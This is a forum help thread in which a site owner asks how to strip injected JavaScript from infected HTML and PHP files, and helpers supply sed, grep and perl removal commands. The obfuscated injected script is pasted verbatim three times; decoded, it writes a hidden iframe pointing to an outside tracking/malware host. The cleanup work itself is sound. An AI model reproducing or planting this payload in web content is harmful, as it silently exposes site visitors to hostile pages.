Help with sed find and replace

Hi,
All my index files are infected with this script, help me please to make an linux command to find and replace iin all files with one command. I have a list of infected files.

script:

<script type="text/javascript">var kDkemnvvDLKNSMGISufy = "CTxn60CTxn105CTxn102CTxn114CTxn97CTxn109CTxn101CTxn32CTxn119CTxn105CTxn100CTxn116CTxn104CTxn61CTxn34CTxn52CTxn56CTxn48CTxn34CTxn32CTxn104CTxn101CTxn105CTxn103CTxn104CTxn116CTxn61CTxn34CTxn54CTxn48CTxn34CTxn32CTxn115CTxn114CTxn99CTxn61CTxn34CTxn104CTxn116CTxn116CTxn112CTxn58CTxn47CTxn47CTxn116CTxn114CTxn97CTxn102CTxn102CTxn105CTxn99CTxn45CTxn115CTxn101CTxn97CTxn114CTxn99CTxn104CTxn101CTxn115CTxn46CTxn99CTxn110CTxn47CTxn119CTxn101CTxn98CTxn115CTxn116CTxn97CTxn116CTxn115CTxn47CTxn105CTxn110CTxn46CTxn99CTxn103CTxn105CTxn63CTxn50CTxn34CTxn32CTxn115CTxn116CTxn121CTxn108CTxn101CTxn61CTxn34CTxn98CTxn111CTxn114CTxn100CTxn101CTxn114CTxn58CTxn48CTxn112CTxn120CTxn59CTxn32CTxn112CTxn111CTxn115CTxn105CTxn116CTxn105CTxn111CTxn110CTxn58CTxn114CTxn101CTxn108CTxn97CTxn116CTxn105CTxn118CTxn101CTxn59CTxn32CTxn116CTxn111CTxn112CTxn58CTxn48CTxn112CTxn120CTxn59CTxn32CTxn108CTxn101CTxn102CTxn116CTxn58CTxn45CTxn53CTxn48CTxn48CTxn112CTxn120CTxn59CTxn32CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn58CTxn48CTxn59CTxn32CTxn102CTxn105CTxn108CTxn116CTxn101CTxn114CTxn58CTxn112CTxn114CTxn111CTxn103CTxn105CTxn100CTxn58CTxn68CTxn88CTxn73CTxn109CTxn97CTxn103CTxn101CTxn84CTxn114CTxn97CTxn110CTxn115CTxn102CTxn111CTxn114CTxn109CTxn46CTxn77CTxn105CTxn99CTxn114CTxn111CTxn115CTxn111CTxn102CTxn116CTxn46CTxn65CTxn108CTxn112CTxn104CTxn97CTxn40CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn61CTxn48CTxn41CTxn59CTxn32CTxn45CTxn109CTxn111CTxn122CTxn45CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn58CTxn48CTxn34CTxn62CTxn60CTxn47CTxn105CTxn102CTxn114CTxn97CTxn109CTxn101CTxn62";var WQKPAWKFcwkNAUrmIniM = kDkemnvvDLKNSMGISufy.split("CTxn");var zsZRFfaXZGVwWgMXCWdf = "";for (var SNsShkFqXnCWgbolGPIg=1; SNsShkFqXnCWgbolGPIg<WQKPAWKFcwkNAUrmIniM.length; SNsShkFqXnCWgbolGPIg++){zsZRFfaXZGVwWgMXCWdf+=String.fromCharCode(WQKPAWKFcwkNAUrmIniM[SNsShkFqXnCWgbolGPIg]);}var qYpDiUKrdiBtNExNUvnG = ""+zsZRFfaXZGVwWgMXCWdf+"";document.write(""+qYpDiUKrdiBtNExNUvnG+"")</script>
<script type="text/javascript">var kDkemnvvDLKNSMGISufy = "CTxn60CTxn105CTxn102CTxn114CTxn97CTxn109CTxn101CTxn32CTxn119CTxn105CTxn100CTxn116CTxn104CTxn61CTxn34CTxn52CTxn56CTxn48CTxn34CTxn32CTxn104CTxn101CTxn105CTxn103CTxn104CTxn116CTxn61CTxn34CTxn54CTxn48CTxn34CTxn32CTxn115CTxn114CTxn99CTxn61CTxn34CTxn104CTxn116CTxn116CTxn112CTxn58CTxn47CTxn47CTxn116CTxn114CTxn97CTxn102CTxn102CTxn105CTxn99CTxn45CTxn115CTxn101CTxn97CTxn114CTxn99CTxn104CTxn101CTxn115CTxn46CTxn99CTxn110CTxn47CTxn119CTxn101CTxn98CTxn115CTxn116CTxn97CTxn116CTxn115CTxn47CTxn105CTxn110CTxn46CTxn99CTxn103CTxn105CTxn63CTxn50CTxn34CTxn32CTxn115CTxn116CTxn121CTxn108CTxn101CTxn61CTxn34CTxn98CTxn111CTxn114CTxn100CTxn101CTxn114CTxn58CTxn48CTxn112CTxn120CTxn59CTxn32CTxn112CTxn111CTxn115CTxn105CTxn116CTxn105CTxn111CTxn110CTxn58CTxn114CTxn101CTxn108CTxn97CTxn116CTxn105CTxn118CTxn101CTxn59CTxn32CTxn116CTxn111CTxn112CTxn58CTxn48CTxn112CTxn120CTxn59CTxn32CTxn108CTxn101CTxn102CTxn116CTxn58CTxn45CTxn53CTxn48CTxn48CTxn112CTxn120CTxn59CTxn32CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn58CTxn48CTxn59CTxn32CTxn102CTxn105CTxn108CTxn116CTxn101CTxn114CTxn58CTxn112CTxn114CTxn111CTxn103CTxn105CTxn100CTxn58CTxn68CTxn88CTxn73CTxn109CTxn97CTxn103CTxn101CTxn84CTxn114CTxn97CTxn110CTxn115CTxn102CTxn111CTxn114CTxn109CTxn46CTxn77CTxn105CTxn99CTxn114CTxn111CTxn115CTxn111CTxn102CTxn116CTxn46CTxn65CTxn108CTxn112CTxn104CTxn97CTxn40CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn61CTxn48CTxn41CTxn59CTxn32CTxn45CTxn109CTxn111CTxn122CTxn45CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn58CTxn48CTxn34CTxn62CTxn60CTxn47CTxn105CTxn102CTxn114CTxn97CTxn109CTxn101CTxn62";var WQKPAWKFcwkNAUrmIniM = kDkemnvvDLKNSMGISufy.split("CTxn");var zsZRFfaXZGVwWgMXCWdf = "";for (var SNsShkFqXnCWgbolGPIg=1; SNsShkFqXnCWgbolGPIg<WQKPAWKFcwkNAUrmIniM.length; SNsShkFqXnCWgbolGPIg++){zsZRFfaXZGVwWgMXCWdf+=String.fromCharCode(WQKPAWKFcwkNAUrmIniM[SNsShkFqXnCWgbolGPIg]);}var qYpDiUKrdiBtNExNUvnG = ""+zsZRFfaXZGVwWgMXCWdf+"";document.write(""+qYpDiUKrdiBtNExNUvnG+"")</script>

Open in new window

adrimansscAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Maciej SsysadminCommented:
If all the lines are the same (or at least they have the same starting string), you may use below command.
Create backup first.

This will delete all the lines containing <script type="text/javascript">var kDkemnvvDLKNSMGISufy from all files in current directory.
sed -i '/<script type="text\/javascript">var kDkemnvvDLKNSMGISufy/d' *

Open in new window

0
HonorGodSoftware EngineerCommented:
I have seen similar things, and have used:

find to locate files with a pattern like:
  ^<script.*String.fromCharCode.(document.write.*script>$

and to then use grep to discard that line:

  grep -v "^<script.*String.fromCharCode.(document.write.*script>$" {} >filename.out

For verification, and then renaming of *.out to the original html or js...

Good luck
0
Todd MummertCommented:

creates a backup file fname.bak for each file and removes the script, even if it spans multiple lines (assuming multiple lines break on whitespace).


1) assumes kDkemnvvDLKNSMGISufy is the var name

perl -i.bak -0pe 's,<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>,,\r?\n,,gs' fname ....

or to check all files in a directory including subdirs:

find . -type f | xargs perl -i.bak -0pe 's,<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>\r?\n,,gs'


Basically, we're looking for a script that starts w/ that first line of text including the variable... up through the first ending tag thereafter, and removing the expression.   We're reading the whole file in as a single line and treating newlines as whitespace....  if the script is split across multiple lines this will still remove it.   The funky \r?\n stuff at the end is to handle the difference between dos and unix line processing.... in case the script stuff has dos endings on a linux machine.


0
Determine the Perfect Price for Your IT Services

Do you wonder if your IT business is truly profitable or if you should raise your prices? Learn how to calculate your overhead burden with our free interactive tool and use it to determine the right price for your IT services. Download your free eBook now!

Todd MummertCommented:
argh..screwed up the first one up there:  two many ,, cut and pastes

perl -i.bak -0pe 's,<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>\r?\n,,gs' fname ....
0
adrimansscAuthor Commented:
climbgunks:,


You are great!

I find that php files are also infected,

can somebody help me to remove this javascript form php ?


<?php echo '<script type="text/javascript">var kDkemnvvDLKNSMGISufy = "CTxn60CTxn105CTxn102CTxn114CTxn97CTxn109CTxn101CTxn32CTxn119CTxn105CTxn100CTxn116CTxn1
04CTxn61CTxn34CTxn52CTxn56CTxn48CTxn34CTxn32CTxn104CTxn101CTxn105CTxn103CTxn104CTxn116CTxn61CTxn34CTxn54CTxn48CTxn34CTxn32CTxn115CTxn114CTxn99CTxn61CTxn34CTx
n104CTxn116CTxn116CTxn112CTxn58CTxn47CTxn47CTxn116CTxn114CTxn97CTxn102CTxn102CTxn105CTxn99CTxn45CTxn115CTxn101CTxn97CTxn114CTxn99CTxn104CTxn101CTxn115CTxn46C
Txn99CTxn110CTxn47CTxn119CTxn101CTxn98CTxn115CTxn116CTxn97CTxn116CTxn115CTxn47CTxn105CTxn110CTxn46CTxn99CTxn103CTxn105CTxn63CTxn50CTxn34CTxn32CTxn115CTxn116C
Txn121CTxn108CTxn101CTxn61CTxn34CTxn98CTxn111CTxn114CTxn100CTxn101CTxn114CTxn58CTxn48CTxn112CTxn120CTxn59CTxn32CTxn112CTxn111CTxn115CTxn105CTxn116CTxn105CTxn
111CTxn110CTxn58CTxn114CTxn101CTxn108CTxn97CTxn116CTxn105CTxn118CTxn101CTxn59CTxn32CTxn116CTxn111CTxn112CTxn58CTxn48CTxn112CTxn120CTxn59CTxn32CTxn108CTxn101C
Txn102CTxn116CTxn58CTxn45CTxn53CTxn48CTxn48CTxn112CTxn120CTxn59CTxn32CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn58CTxn48CTxn59CTxn32CTxn102CTxn105CTx
n108CTxn116CTxn101CTxn114CTxn58CTxn112CTxn114CTxn111CTxn103CTxn105CTxn100CTxn58CTxn68CTxn88CTxn73CTxn109CTxn97CTxn103CTxn101CTxn84CTxn114CTxn97CTxn110CTxn115
CTxn102CTxn111CTxn114CTxn109CTxn46CTxn77CTxn105CTxn99CTxn114CTxn111CTxn115CTxn111CTxn102CTxn116CTxn46CTxn65CTxn108CTxn112CTxn104CTxn97CTxn40CTxn111CTxn112CTx
n97CTxn99CTxn105CTxn116CTxn121CTxn61CTxn48CTxn41CTxn59CTxn32CTxn45CTxn109CTxn111CTxn122CTxn45CTxn111CTxn112CTxn97CTxn99CTxn105CTxn116CTxn121CTxn58CTxn48CTxn3
4CTxn62CTxn60CTxn47CTxn105CTxn102CTxn114CTxn97CTxn109CTxn101CTxn62";var WQKPAWKFcwkNAUrmIniM = kDkemnvvDLKNSMGISufy.split("CTxn");var zsZRFfaXZGVwWgMXCWdf =
"";for (var SNsShkFqXnCWgbolGPIg=1; SNsShkFqXnCWgbolGPIg<WQKPAWKFcwkNAUrmIniM.length; SNsShkFqXnCWgbolGPIg++){zsZRFfaXZGVwWgMXCWdf+=String.fromCharCode(WQKPA
WKFcwkNAUrmIniM[SNsShkFqXnCWgbolGPIg]);}var qYpDiUKrdiBtNExNUvnG = ""+zsZRFfaXZGVwWgMXCWdf+"";document.write(""+qYpDiUKrdiBtNExNUvnG+"")</script>'; ?>
0
Todd MummertCommented:
perl -i.bak -0pe 's,<\?php\s+echo\s+\'<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>\'\;\s+\?>\r?\n,,gs' fname ....

and this will do the recursive thingy...looking only for *.php files

find . -type f -iname \*.php | xargs perl -i.bak -0pe 's,<\?php\s+echo\s+\'<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>\'\;\s+\?>\r?\n,,gs'
0
adrimansscAuthor Commented:
somewhere in your last script is an error and I can't find it.. please help!!!

when I press enter, I see ">"
0
Todd MummertCommented:
shell quoting problem probably... try this instead


find . -type f -iname \*.php | xargs perl -i.bak -0pe "s,<\?php\s+echo\s+\'<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>\'\;\s+\?>\r?\n,,gs"

0
Todd MummertCommented:
I knew this at one time...

escaping a single quote inside a single quoted expression looks like   '\''     ...basically end the first, escape the single quote, and start the next.   just fyi

find . -type f -iname \*.php | xargs perl -i.bak -0pe 's,<\?php\s+echo\s+'\''<script\s+type=\"text/javascript\">var\s+kDkemnvvDLKNSMGISufy.*?</script>'\''\;\s+\?>\r?\n,,gs'

0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
adrimansscAuthor Commented:
Thanks man!!!

it works in this way

perl -i.bak -0pe 's,<\?php\s+echo\s+'\''var\s+kDkemnvvDLKNSMGISufy.*?script>'\''\;\s+\?>\r?,,gs' `cat inf-java.txt`

just removed \n from the end.

Thanks again!
0
adrimansscAuthor Commented:
climbgunks you are great! Thanks!
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Linux

From novice to tech pro — start learning today.